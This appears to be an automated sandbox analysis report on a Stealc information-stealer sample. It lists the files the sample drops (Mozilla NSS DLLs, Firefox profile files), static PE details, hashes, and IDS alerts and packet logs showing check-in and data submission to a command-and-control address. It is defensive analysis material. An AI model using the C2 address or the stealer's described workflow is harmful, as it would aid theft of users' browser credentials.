Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ND2WP0Fip7.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: C5u5BZq8gj.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946578519708674
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'856'512 bytes
MD5:	bb5a205420d330a463af2accf2fadee5
SHA1:	3833856b3ff0c76309185e0dd43a44af646bda27
SHA256:	50d69450bffd0161f1b7ccb2628fe4c956b58ecb577262961de90f95c0a61c41
SHA512:	8bc4993aada56b136f8810ac727f5b1a3e5ac1322304d34f356a3e37be2f2493c49a48a4201f34127c8f8e7d8b1356109d0ee7e9ad26c0a4aed30c0d978f808b
SSDEEP:	49152:RzPMevjAmKi4lwJdYG34rL7kqL3PwVmr0:xHrAdWyCY0qL3Pimr0
TLSH:	6B8533013E3323B0C88F04F46ED36DD6A6B5DE15105B9098822B9FF769667FD68B1718
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xaa1000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF2D4B83B8Ah
rdmsr
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FF2D4B85B85h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	69dcfdc6bb23df53986295cdf072f16e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2a2000	0x200	36d6d0b0dfe1298363cf6f7533ccb4a2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
buwyflyk	0x500000	0x1a0000	0x19f200	2c021cda7163faabf41c47c7a6785609	False	0.99487341444595	data	7.953044522628886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bixnnjmh	0x6a0000	0x1000	0x400	405eb2abbfc52363c185b77e596376eb	False	0.765625	data	6.041882602526751	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6a1000	0x3000	0x2200	6584f19f69db4821e59f775b6069477e	False	0.09869025735294118	DOS executable (COM)	1.1394429516878564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T01:53:12.105586+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:12.367012+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:12.463241+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49705	TCP
2024-10-14T01:53:12.690550+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:12.697502+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49705	TCP
2024-10-14T01:53:13.676631+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:14.126593+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:18.919582+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:20.121463+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:20.787638+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:21.333779+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:23.128788+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP
2024-10-14T01:53:23.577758+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49705	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 01:53:11.080800056 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:11.085880041 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:11.085974932 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:11.086157084 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:11.091137886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:11.812107086 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:11.812194109 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:11.845838070 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:11.850725889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.105304956 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.105586052 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.135370016 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.140336037 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.366935015 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.366972923 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.367012024 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.367043018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.457253933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.457446098 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.458470106 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.463241100 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.690480947 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.690499067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.690511942 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.690550089 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.690716028 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.691067934 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.691082001 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.691096067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.691118956 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.691134930 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.691159010 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.691200018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.691200972 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.691242933 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.692735910 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.697501898 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.924735069 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.924798965 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.940268993 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.940291882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:12.945328951 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.945347071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.945359945 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.945372105 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.945384026 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.945568085 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:12.945580959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:13.676563025 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:13.676630974 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:13.897346020 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:13.902391911 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.126425982 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.126461029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:14.126593113 CEST	49705	80	192.168.2.5	185.215.113.37
